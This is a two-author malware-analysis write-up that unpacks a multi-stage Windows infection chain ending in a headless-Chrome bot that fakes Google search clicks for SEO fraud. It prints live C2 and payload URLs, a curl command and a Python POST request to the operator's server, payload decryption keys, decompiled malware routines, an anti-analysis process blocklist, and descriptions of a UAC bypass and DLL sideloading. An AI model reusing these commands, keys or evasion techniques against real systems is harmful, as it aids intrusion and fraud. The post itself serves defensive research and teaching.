Get your swimsuit, we're diving into a black SEO scheme

Sample:
9da5191c78e49b46e479cdfe20004a9d76ccc4a545deeb83e3c07f83db9cf736 (Bazaar, VT)
Infection chain:
Zig downloader -> Python downloader/updater -> C++ downloader -> DonutLoader -> Golang final malware
Tools used:
Malcat, IDA Pro, DiE
Difficulty:
Beginner/intermediate

Last Friday, during a Malcat testing session, I stumbled upon a sample on Malware Bazaar uploaded by skocherhan, a sample without any convincing detection name. Since the sample looked fun, I posted the link on Malcat's discord server where I was quickly joined by Thomas Klemenc for a duo analysis session. And after a couple of hours, 5 malicious stages and 4 different programming languages later, we finally stumbled upon a rather niche black SEO campaign. While not very sophisticated, this sample is rather easy to follow and fun to unpack, making it a good target for a blog post. So get your swimsuit on and dive with us!

Note: since the analysis of this malware was a join effort, this article has been written with two pairs of hands. Each chapter will be prefixed with either Renaud or Thomas depending on the author. We thought it would be more interesting this way!

Stage 1: An unknown sample

Thomas: Let us analyse the first binary (Bazaar, VT). Skimming over the strings, we find multiple interesting ones, such as:

  • WinHttpReadData
  • hxxps://down.temp-xy.com/update/python3.zip
  • svpy.exe
  • maintaindown.py
  • Zig WinHTTP Client

The binary seems to be created using the relatively new Zig programming language, which has yet to see widespread use in malware development, and also tends to trip up decompilers quite a bit. Luckily, it doesn't do a lot, so the functionality is quickly uncovered. The purpose of the binary is to download the file python3.zip from the following url:

  • hxxps://down.temp-xy.com/update/python3.zip

The archive contains a full python distribution, along with a small DLL named ISCSIEXE.dll and a suspicious script named maintaindown.py. Once downloaded, the archive is extracted and the following command is run:

  • svpy.exe maintaindown.py

The program svpy.exe is just a renamed pythonw.exe, which is used to run a python file without displaying a console window.

Stage 2: maintaindown.py

Renaud: The file maintaindown.py (uploaded to Malware Bazaar) is an obfuscated python script with few detections on Virustotal. While the code looks untouched, most of the strings are encrypted, which is annoying. By chance, the script does not hide the decryption function. So let us just reuse the decryption function to clean the python file (I love python malware :):

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
# v-- copy-pasted from maintaindown.py
def _c_(ΒOQΙΕ0ΕBΕΙS_Ο_l: str) ->str:
    try:
        if not isinstance(ΒOQΙΕ0ΕBΕΙS_Ο_l, str
            ) or not ΒOQΙΕ0ΕBΕΙS_Ο_l.startswith('x'):
            return ΒOQΙΕ0ΕBΕΙS_Ο_l
        Zρρl_1_ΕΟΒ5_Ρ8_Q_ = int(ΒOQΙΕ0ΕBΕΙS_Ο_l[1:2])
        I1_lΙ1ι_ΡΤΕ = int(ΒOQΙΕ0ΕBΕΙS_Ο_l[2:3])
        QQIρΡ_lεοOΡ0_ = ΒOQΙΕ0ΕBΕΙS_Ο_l[3:]
        ΕρI28Τ1ΒΕο_I_8 = [lambda data: base64.b85decode(data.encode('utf-8'
            )).decode('utf-8'), lambda data: base64.b64decode(data.encode(
            'utf-8')).decode('utf-8'), lambda data: base64.b64decode(data.
            encode('utf-8'))[16:].decode('utf-8')]
        ΡZ1_l_2Q_Q_ε_O8Oβ = min(Zρρl_1_ΕΟΒ5_Ρ8_Q_ - 1, len(ΕρI28Τ1ΒΕο_I_8) - 1)
        ΡΤOQ_ιZε_ = QQIρΡ_lεοOΡ0_
        for _ in range(I1_lΙ1ι_ΡΤΕ):
            ΡΤOQ_ιZε_ = ΕρI28Τ1ΒΕο_I_8[ΡZ1_l_2Q_Q_ε_O8Oβ](ΡΤOQ_ιZε_)
        return ΡΤOQ_ιZε_
    except Exception as e:
        return ΒOQΙΕ0ΕBΕΙS_Ο_l

# just run the decryption function on all encrypted strings:
with open("maintaindown.py", "r", encoding="utf8") as f:
    data = f.read()
    res = re.sub(r"_c_\(\s*'(.*?)'\s*\)", lambda m: repr(_c_(m.group(1))), data)    # replace all calls to the decryption function _c_()
    print(res)

After running the script above, we get the following cleaned maintaindown.py: see on pastebin.

UAC bypass

The script first uses a known UAC bypass exploiting the DLL search order of iscsicpl.exe to load a malicious ISCSIEXE.dll (remember the tiny dll found in the archive?). And since iscsicpl.exe is an autoelevate binary, it can thus be used to run the DLL with elevated privileges.

The python3.zip archive downloaded by the first stage
Figure 2: The python3.zip archive downloaded by the first stage

The DLL is rather simple and will simply run the file \AppData\Local\Temp\runs.vbs. The VBS script has been previously written there by maintaindown.py. It is just using the Wscript.Shell to re-run itself (aka maintaindown.py) with elevated privileges.

Download and persistence

Once running with elevated privilege, the script will download and unpack (using the hardcoded password 'QwE123QwE123QwEl23QwE123') the two following ZIP archives:

  • hxxps://down.temp-xy.com/update/onedrive.zip, extracted to %localappdata%\Microsoft\OneDrive\setup
  • hxxps://down.temp-xy.com/update/onedrivetwo.zip, extracted to %localappdata%\Microsoft\Windows\Caches

Shorty after, the same script creates two scheduled tasks:

  • SvcPowerGreader (Task 1)

    TaskPath:
    \Microsoft\Windows\SoftwareProtectionPlatform
    Trigger:
    13 minutes after startup
    Action:
    Run OneDrivePatcher.exe from the archive onedrive.zip
  • PythonConverter (Task 2)

    TaskPath:
    \Microsoft\Windows\AppID
    Trigger:
    20 minutes after startup
    Action:
    Runs Guardian.exe with the argument update.py from the archive onedrive2.zip

The script update.py, run by the second task, is in charge of updating the archive onedrive.zip. It downloads primarily from the same URL as before. But if that fails, it can additionally check an alternate url stored at:

hxxps://pastebin.com/raw/r1V9at1z

Currently, this points to hxxps://qu.ax/dcvwP.zip, which is identical to onedrive.zip.

The first archive, onedrive.zip, is more interesting and contains the third stage of the malware which will be described in the next chapter.

Stage 3: OneDrivePatcher.exe

Thomas: Stage 3, which now lives in %LocalAppData%\Microsoft\OneDrive\setup, consists of these files:

The "Onedrive" archive
Figure 3: The "Onedrive" archive

The file OneDrivePatcher.exe is a legitimate Microsoft binary. The signature is valid, and the certificate chain ends in a trusted root CA:

"OneDrivePatcher" authenticode certificate
Figure 4: "OneDrivePatcher" authenticode certificate

The same cannot be said about UpdateRingSettings.dll, which also would like you to believe it is signed by "Microsoft Corporation" using a self-signed certificate.

"UpdateRingSettings" authenticode certificate
Figure 5: "UpdateRingSettings" authenticode certificate

The program OneDrivePatcher.exe imports and calls the function named GetUpdateRingSettingsManager from the .dll as one of the very first actions it takes in WinMain. Otherwise, it doesn't do anything that would be relevant here.

"OneDrivePatcher" imports
Figure 6: "OneDrivePatcher" imports
"OneDrivePatcher" calls GetUpdateRingSettingsManager()
Figure 7: "OneDrivePatcher" calls GetUpdateRingSettingsManager()

Having a legitimate signed binary load a malicious dll is a common technique known as DLL sideloading. Used by many threat actors, the goal of this technique is usually to give a bit of legitimacy to the infection chain and sometimes bypass the weakest security solutions.

And indeed, all the important behavior stems from the side-loaded self-signed DLL. When one of its two exported functions is called, UpdateRingSettings.dll will perform the following steps:

  1. Anti-analysis checks
  2. Retrieve decryption keys
  3. Retrieve payload
  4. Decrypt and unpack payload

Anti-analysis checks

In UpdateRingSettings.dll, we encounter multiple anti-analysis checks, both in DllMain and in GetUpdateRingSettingsManager.

  • Exit if physical RAM is less than 0xC0000000 bytes (3 GiB)
  • Check if there's at least 1000 entries in the System event log
  • Check if a random 1000 - 2000 ms Sleep() takes at least 800 ms
  • Check if any of the running processes include one of these strings in their image path:

    wireshark processhacker fiddler
    procexp procexp64 taskmgr
    procmon sysmon ida
    x32dbg x64dbg ollydbg
    cheatengine scylla scylla_x64
    scylla_x86 immunitydebugger windbg
    reshacker reshacker32 reshacker64
    hxd ghidra lordpe
    tcpview netmon sniffer
    snort apimonitor radare2
    procdump dbgview de4dot
    detectiteasy detectit_easy dumpcap
    netcat bintext dependencywalker
    dependencies prodiscover sysinternals
    netlimiter sandboxie virtualbox
  • GetUpdateRingSettingsManager runs the same checks a second time, and additionally checks if the file CertificateIn.dat exists in the same directory as the dll. If it doesn't exist, the process exits as well.

If all the anti-analysis checks are successful, GetUpdateRingSettingsManager gets to work.

Retrieve decryption keys

After all anti-analysis checks passed, the program attempts to download 2 encryption keys. Looking at get_keys, we see, the URL is copied from the global at 0x18001BB50:

... which in turn gets written to by this function:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
void **construct_key_URL() {
  __int16 v0; // ax
  unsigned __int64 v1; // r8
  unsigned __int64 v2; // rdx
  __int64 v3; // rbx
  __int16 v4; // ax
  void **v5; // rcx
  _DWORD v7[22]; // [rsp+20h] [rbp-60h]
  void **v8; // [rsp+78h] [rbp-8h]

  v8 = &g_key_URL;
  v0 = 23;
  v7[0] = 720919;
  v7[1] = 983051;
  v7[2] = 4521996;
  v7[3] = 5242960;
  v7[4] = 1048603;
  v7[5] = 1114120;
  v7[6] = 720977;
  v7[7] = 1179674;
  v7[8] = 5373967;
  v1 = 7;
  v7[9] = 393223;
  v7[10] = 1835089;
  v7[11] = 1179664;
  v7[12] = 1835088;
  v7[13] = 1769488;
  v7[14] = 5242906;
  v7[15] = 5308436;
  v7[16] = 458763;
  v7[17] = 11;
  *(_OWORD *)&g_key_URL = 0;
  v2 = 0;
  *(_QWORD *)&xmmword_18001BB60 = 0;
  *((_QWORD *)&xmmword_18001BB60 + 1) = 7;
  LOWORD(g_key_URL) = 0;
  v7[20] = 1;
  v3 = 0;
  while ( 1 )
  {
    v4 = v0 ^ 0x7F;
    if ( v2 >= v1 )
    {
      sub_180009950(&g_key_URL);
    }
    else
    {
      *(_QWORD *)&xmmword_18001BB60 = v2 + 1;
      v5 = &g_key_URL;
      if ( v1 > 7 )
        v5 = (void **)g_key_URL;
      *((_WORD *)v5 + v2) = v4;
      *((_WORD *)v5 + v2 + 1) = 0;
    }
    ++v3;
    v0 = *((_WORD *)v7 + v3);
    if ( !v0 )
      break;
    v1 = *((_QWORD *)&xmmword_18001BB60 + 1);
    v2 = xmmword_18001BB60;
  }
  return &g_key_URL;
}

The string is constructed from a list of 16 bit values stored in an array of DWORDs, XOR-ing each WORD with 0x7F. We can reconstruct it like so:

1
2
3
4
5
6
7
v7 = [720919, 983051, 4521996, 5242960, 1048603, 1114120, 720977, 1179674, 5373967,
      393223, 1835089, 1179664, 1835088, 1769488, 5242906, 5308436, 458763, 11]
out = []
for d in v7:
    for w in (d & 0xFFFF, (d >> 16) & 0xFFFF): # split into low and high 16 bits
        out.append(chr(w ^ 0x7F))
print(''.join(out))

resulting in hxxps://down.temp-xy.com/code/k.txt which holds the 2 keys needed for decrypting the payload:

curl hxxps://down.temp-xy.com/code/k.txt
r9bKWWjJqBj5Rje630uA9tWZDDFM96ON
PcSLkpK7VNjshVw4SGLAi31fz83aRCSi

Retrieve the payload

Similar to the key URL, the payload URL gets constructed the same way:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
void **construct_payload_URL() {
  __int16 v0; // ax
  unsigned __int64 v1; // r8
  unsigned __int64 v2; // rdx
  __int64 v3; // rbx
  __int16 v4; // ax
  void **v5; // rcx
  _DWORD v7[22]; // [rsp+20h] [rbp-60h]
  void **v8; // [rsp+78h] [rbp-8h]

  v8 = &g_payload_URL;
  v0 = 23;
  v7[0] = 720919;
  v7[1] = 983051;
  v7[2] = 4521996;
  v7[3] = 5242960;
  v7[4] = 1048603;
  v7[5] = 1114120;
  v7[6] = 720977;
  v7[7] = 1179674;
  v7[8] = 5373967;
  v1 = 7;
  v7[9] = 393223;
  v7[10] = 1835089;
  v7[11] = 1179664;
  v7[12] = 1835088;
  v7[13] = 1769488;
  v7[14] = 5242906;
  v7[15] = 5308428;
  v7[16] = 458763;
  v7[17] = 11;
  *(_OWORD *)&g_payload_URL = 0;
  v2 = 0;
  *(_QWORD *)&xmmword_7FF9EA72BC58 = 0;
  *((_QWORD *)&xmmword_7FF9EA72BC58 + 1) = 7;
  LOWORD(g_payload_URL) = 0;
  v7[20] = 1;
  v3 = 0;
  while ( 1 )
  {
    v4 = v0 ^ 0x7F;
    if ( v2 >= v1 )
    {
      sub_7FF9EA719950(&g_payload_URL);
    }
    else
    {
      *(_QWORD *)&xmmword_7FF9EA72BC58 = v2 + 1;
      v5 = &g_payload_URL;
      if ( v1 > 7 )
        v5 = (void **)g_payload_URL;
      *((_WORD *)v5 + v2) = v4;
      *((_WORD *)v5 + v2 + 1) = 0;
    }
    ++v3;
    v0 = *((_WORD *)v7 + v3);
    if ( !v0 )
      break;
    v1 = *((_QWORD *)&xmmword_7FF9EA72BC58 + 1);
    v2 = xmmword_7FF9EA72BC58;
  }
  return &g_payload_URL;
}

We reconstruct it using the script from earlier and get https://down.temp-xy.com/code/s.txt

This file then gets subsequently downloaded using winhttp methods. Interestingly, before actually downloading the file, 2 anti-analysis checks get run again, the check for CertificateIn.dat and the check for debugger filenames in running processes.

Looking at the downloaded file s.txt in Malcat, we immediately see that it's very high entropy throughout the file, and no readable data can be retrieved, most likely meaning it's compressed and/or encrypted (turns out it's both).

Decrypt the payload

Back in the decompilation, backing out of get_payload into GetUpdateRingSettingsManager() a bit further down we can quickly spot what looks a decryption routine. Looks like we are looping through something and XOR-ing a byte twice with every iteration. Here's the function pseudo-C code with renamed variables:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
for ( i = 0; i < enc_data_length; ++i ) {
   key2_ptr = &key2;
   if ( v47 > 0xF )
     key2_ptr = (__int128 *)key2;
   temp_byte = *((unsigned __int8 *)key2_ptr + i % key2_length); // get byte of key2
   LOBYTE(temp_byte) = *((_BYTE *)enc_data + i) ^ temp_byte; //  data[i] XOR selected key1 byte
   *((_BYTE *)enc_data + i) = temp_byte; // store back to data
   key1_ptr = &key1;
   if ( v50 > 0xF )
     key1_ptr = (__int128 *)key1;
   LOBYTE(temp_byte) = *((_BYTE *)key1_ptr + i % key1_length) ^ temp_byte; // get byte of key1 and XORs with temp byte
   *((_BYTE *)enc_data + i) = temp_byte; 
}

The payload is decrypted in place using a two-stage XOR algorithm: each byte is first XORed with a repeating byte pattern from key 2, then XORed again with a repeating byte pattern from key 1.

Renaud: a quick tip to malware author wanabees: xoring data with two keys of the same size does not make your encryption stronger ^^

To retrieve the payload, we could either dump it from memory, or decrypt it ourselves:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
import sys

ENCRYPTED_FILE = r"C:\Users\user\Downloads\s.txt"
DECRYPTED_OUTPUT_FILE = "decrypted.bin"

KEY1_STR = "r9bKWWjJqBj5Rje630uA9tWZDDFM96ON".encode('ascii') # from k.txt
KEY2_STR = "PcSLkpK7VNjshVw4SGLAi31fz83aRCSi".encode('ascii')

with open(ENCRYPTED_FILE, 'rb') as f:
    encrypted = f.read()
    decrypted = bytearray()
    data_len = len(encrypted)
    for i in range(data_len):
        temp = encrypted[i] ^ KEY1_STR[i % 32]  # XOR with byte of key1 
        dec_byte = temp ^ KEY2_STR[i % 32]  # then XOR with byte of key2
        decrypted.append(dec_byte)
    with open(DECRYPTED_OUTPUT_FILE, 'wb') as f:
        f.write(decrypted)

The resulting file is ZLIB-compressed

s.txt decrypted
Figure 14: s.txt decrypted

so we quickly add decompression to our script:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
import sys
import zlib

ENCRYPTED_FILE = r"C:\Users\user\Downloads\s.txt"
DECRYPTED_OUTPUT_FILE = "decrypted.bin"

KEY1_STR = "r9bKWWjJqBj5Rje630uA9tWZDDFM96ON".encode('ascii')
KEY2_STR = "PcSLkpK7VNjshVw4SGLAi31fz83aRCSi".encode('ascii')

with open(ENCRYPTED_FILE, 'rb') as f:
    encrypted = f.read()
    decrypted = bytearray()
    data_len = len(encrypted)
    for i in range(data_len):
        temp = encrypted[i] ^ KEY1_STR[i % 32]  # XOR with byte of key1 
        dec_byte = temp ^ KEY2_STR[i % 32]  # thenXOR with byte of key2
        decrypted.append(dec_byte)
    decompressed = zlib.decompress(decrypted)
    with open(DECRYPTED_OUTPUT_FILE, 'wb') as f:

        f.write(decompressed)

This yields us stage 4 (you're still with us, right?), a shellcode blob. The blob is finally run in a separate thread via a call to CreateThread.

Stage 4: Donut shellcode

Thomas: After decrypting and decompressing the downloaded file, we get a 10 MiB shellcode blob. DIE tells us that it is Donut shellcode

Detect it Easy identifes DonutLoader
Figure 15: Detect it Easy identifes DonutLoader

Donut is a shellcode generator and reflective loader for unmanaged and managed Windows payloads. A quick look at the binary in Malcat's Hex-Editor confirms the assumption, as it shows the donut typical first bytes in the form of a jmp (E8) , then the same integer twice. The first one is the jump address, the second is the size of the instance

We'll set the file type to Shellcode and force a function start at the beginning of the file. This will trigger Malcat's CFG recovery algorithm.

Setting the shellcode entry point
Figure 17: Setting the shellcode entry point

Now we'll ask Kesakode again what it thinks of the sample. It now correctly identifies it as DonutLoader as well, and thus confirms what we already assumed.

Kesakode identifes DonutLoader
Figure 18: Kesakode identifes DonutLoader

Donut supports optional encryption of the payload, which was not used in this sample. The compression algorithm that was used is XPRESS, which is Microsofts implementation of the LZ77 algorithm. It is designed for speed, and is used quite heavily in Microsoft products, for example in SMB, WSUS, and Windows.

Donut uses the WinAPI RtlCompressBuffer for compression, which was also used to decompress the sample. A quick script was written to scan for the header, which consists of 2 integers (compressed and decompressed size), and decompress the final payload, described in the next chapter.

Renaud: a (native) Xpress decryption transform will be added to the next version of Malcat.

Stage 5: Golang stealth automated browser

Renaud: Now that the DonutLoader is out of the way, we can have a look of what we hope is the final stage of the malware. So what did we got, what could justify such a convoluted chain of infection? An infostealer? An APT?

What we are looking at is a 20MB Golang sample of sha256 e94ec5980d1f7cc5b9ece979caf01803b6f75408ebaa83016f3071514a73d443 (Bazaar, VT), again without any convincing detection. Kesakode gives a relatively low 43% detection verdict toward StowAway. After further inspection this looks like a false positive, since most of the detections are library functions (e.g. an HTTP library also used by StowAway).

Note: while Kesakode often points you in the right direction, you still have to cross-check function and string hits to see if the detection makes sense, especially for low scores and for programming languages that pack all libraries statically (such as rust or Golang).

Judging by the entropy, the sample does not look packed, but the Golang symbols have been scrambled, which should make the analysis of such a large binary more difficult. Additionally, while we can see many chromium and browser-related strings in the binary, nothing obviously malicious has come to our attention.

A  Huge Golang binary
Figure 19: A Huge Golang binary

Now I don't know for you, but reversing 20MB of scrambled Golang is not really my definition of fun. If we want to learn what this malware is up to, we will have to resort to other methods.

Dynamic analysis

First thing first, let us try to run the sample inside a sandbox. A quick look into Hybrid Analysis's report tells us that the samples spawns several headless chrome instances:

Hybrid analysis: headless chrome instances are started
Figure 20: Hybrid analysis: headless chrome instances are started

Most of the network traffic seems to land on google-related websites. One domain stands out though: a POST request is made to the url hxxps://git.temp-xy.com. Sadly, it doesn't really helps us in identifying the malware.

Hybrid analysis: HTTPS traffic
Figure 21: Hybrid analysis: HTTPS traffic

Using the packet information provided by the sandbox logs, we can write a small python scripts that simulates the sent packet:

1
2
3
4
5
6
7
8
import requests
data = requests.post("hxxps://git.temp-xy.com", headers={   # headers infered from the sandbox report
    "Hash": "",
    "Id": "89c376f27cc6bdcae1ef5173a42110ad048dec74cc5a643fe1bc33f3730662c",
    "Task-Id": "",
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Geck0) Chrome/99.0.0.0 Safari/537.1",
    "Accept-Encoding": "gzip"})
print(data)

The response is a 1732 bytes (the size seems to never change) base64-encoded text blob. Once decoded, the content sadly appears to be encrypted and changes every time. This could mean that either the key is embedded in the response, or that a nonce-based encryption is used. Interesting, but not very helpful.

Response packet from hxxps://git.temp-xy.com
Figure 22: Response packet from hxxps://git.temp-xy.com

Looking for embedded content

Another way to discover the intent of the Golang program is to ignore the 8MB of code and look at the data inside the program. The first thing that comes to our attention are the two ZIP archives embedded inside the .data section:

  • A 130KB chrome extension at address 0x169a849. This appear to be the (clean) NopeCHA chrome extension
  • A 358KB chrome extension at address 0x16bb809. This appear to be the (clean) Buster captcha chrome extension

This is rather interesting. While password-stealing chrome extensions are commonly found in infostealers, legit extensions are not. If we add this information to what we have learnt via the sandbox report, it does seem that this malware may act like an automated browser.

The NopeCHA chrome extension
Figure 23: The NopeCHA chrome extension

But we are not finished with our tour. Looking at the list of anomalies in Malcat, we can see that the file embeds a huge base64 string at address 0xefbb0e. And we malware analysts love our base64 strings!

Huge base64 string found inside the binary
Figure 24: Huge base64 string found inside the binary

Now the size of the string reported by Malcat is too short, mostly because of the heuristics used to identify Golang strings. But by simply following references to the string, we can quickly learn that the base64 string has a size of 0x132c50.

Tip: if you want to select the whole string in Malcat, it is easy! Just select the beginning of the string, then right-click on the selection and chose Change selection size. You can also simply scroll back to the end of the base64 string and shift+click, but precision is key.

Getting the size of the base64 string
Figure 25: Getting the size of the base64 string

We can then use Malcat's transforms to unpack the base64 string. The decoded content starts with the bytes 1F 8B which is the magic signature for GZIP archive. Once decompressed, we obtain a new PE file:

The huge base64 string is a gzipped Golang program
Figure 26: The huge base64 string is a gzipped Golang program

This new PE file is a 2MB Golang program of sha256 1d11bec16a63d85a386c47fb97914ad13318f7fdcbf399c5a895cf642307f115. Now don't get fooled by all the detections you can see on Malware Bazaar or Virustotal, this binary is actually ... clean! Since it is not obfuscated, tracing its origin is relatively easy. As always for Golang programs, the first location to inspect is the function main.main. We can see in this function that the program accepts a command line argument named --version, version which is hardcoded to the value adb80298fa6a3af7ced8b1c9b5f18007:

main.main() of the embedded program
Figure 27: main.main() of the embedded program

A quick online search for this particular version tag brings us to the github repository of the leakless tool, a Golang utility used to terminate unresponsive programs. Further inspection of the repository source code even gives us our original base64 string. Now why all the false positives from the antivirus industry for such a simple tool? Well according to stack overflow, leakless is used not only by other libraries such as go-rod, but also by numerous malware:

Stackoverflow: leakless seems to be embedded in other malware
Figure 28: Stackoverflow: leakless seems to be embedded in other malware

Wait, according to its github repository, go-rod is a Golang library used to drive chrome headless instance using chrome's DevTool protocol. This sounds familiar... could it be that our first huge Golang binary uses go-rod? A quick string search tells us that yes!

go-rod related strings found in the first Golang binary
Figure 29: go-rod related strings found in the first Golang binary

Command and control protocol

So, back to the first big Golang executable. We know it uses go-rod (and leakless) to drive several headless chrome processes, and that it uses chrome extensions to automatically bypass captchas. But which sites are visited and why remains unknown. What could help is decrypting the response sent by the server at hxxps://git.temp-xy.com. With some luck, we'll find more information there.

So we are back looking at the list of anomalies found in the first Golang program. Other Base64 strings have been identified by Malcat. The first one, located at 0xed113b, seems interesting, since it is the url of our C&C server candidate:

Url of the C&C server is stored encoded in base64
Figure 30: Url of the C&C server is stored encoded in base64

The second string, located at 0xed117b, is event more interesting, for several reasons:

  • It is referenced just after an http "POST" function is called
  • Right after the string is referenced, a function is called, function that references strings containing the words "AES-GCM"
  • While it is never base64-decoded, its size is 32 bytes, which works well with AES
Second "base64" string is used in crypto-related functions
Figure 31: Second "base64" string is used in crypto-related functions

Could AES-GCM be the algorithm used by the malware to communicate with its C&C server? It is a nonce-based algorithm after all. Instead of reversing further the binary, let us try our hypothesis. Usually with the GCM mode, messages are prefixed with a 12 bytes nonce, followed by the actual ciphertext. It's not a rule, but that's the most straightforward way to transmit the nonce. Let us try to decrypt on of the captured packet from earlier in Malcat:

Decrypting the command and control protocol
Figure 32: Decrypting the command and control protocol

It works! We get some nice JSON. Most of the keys seem to be utf-8 encoded Chinese words though. After translation, the response from hxxps://git.temp-xy.com looks like this:

[
  {
    "action": "wait",
    "description": "wait 5000-20000 seconds",
    "wait_time": "1-5"
  },
  {
    "action": "google",
    "keywords": ["plus size swimwear", "plus size dresses", "plus size bathing suits", "plus size swimsuits"],
    "max_page_turns": 10,
    "random_clicks_per_page": ["1:90", "2:10"],
    "link_wait_time": ["388", "1000"],
    "match_links": ["*bloomchic.com/*"]
  },
  {
    "action": "google",
    "keywords": ["Semi Auto Hot Foil Stamping Machine", "hot stamping machine", "automatic silk screen press", "best silk screen machine"],
    "max_page_turns": 10,
    "random_clicks_per_page": ["1:60", "2:40"],
    "link_wait_time": ["390", "1100"],
    "match_links": ["*.cn-superfine.com/*"]
  },
  {
    "action": "google",
    "keywords": ["plus size summer dresses", "plus size swim", "plus size women's clothing", "plus size clothes", "plus size swimwear for women"],
    "max_page_turns": 10,
    "random_clicks_per_page": ["1:60", "2:40"],
    "link_wait_time": ["300", "2300"],
    "match_links": ["*bloomchic.com/*"]
  },
  {
    "action": "google",
    "keywords": ["silk screen printing machine automatic", "cosmetics printing machines", "hot foil stamping equipment"],
    "max_page_turns": 10,
    "random_clicks_per_page": ["2:70", "3:30"],
    "link_wait_time": ["300", "3000"],
    "match_links": ["*www.cn-superfine.com/*"]
  },
  {
    "action": "wait",
    "description": "random wait 10000 - 60000 seconds",
    "wait_time": "800,4000"
  }
]

That is ... something? Needless to say that what not exactly what we were expecting to see at this stage of the infection chain. Especially after so many convoluted steps! But alas, we have now enough information to make an educated guess.

Conclusion

Renaud: From this point, what this malware is really up to can be inferred relatively safely. The malware is a gorod-based invisible browser that gets its browse commands from the website hxxps://git.temp-xy.com. According to the JSON config dictionary above, several google searches are performed, using some (very) specific keywords. When a specific website is spotted inside the result list, its link gets clicked.

By using several sleep timers and randomising some of the actions, the malware tries to pass off its activity as human activity (and thus avoid google bot-detection heuristics). All this together points toward a black SEO campaign. See, the more (human) users are clicking on a website for a given search query, the more weight is given to this website by google for this search. Do this at a large scale, and you can boost the position of any website in the search results relatively easily.

As for why such a convoluted infection chain was used for such a simple piece of "malware", your guess is as good as our. But we're not in the XXL swimsuit industry after all.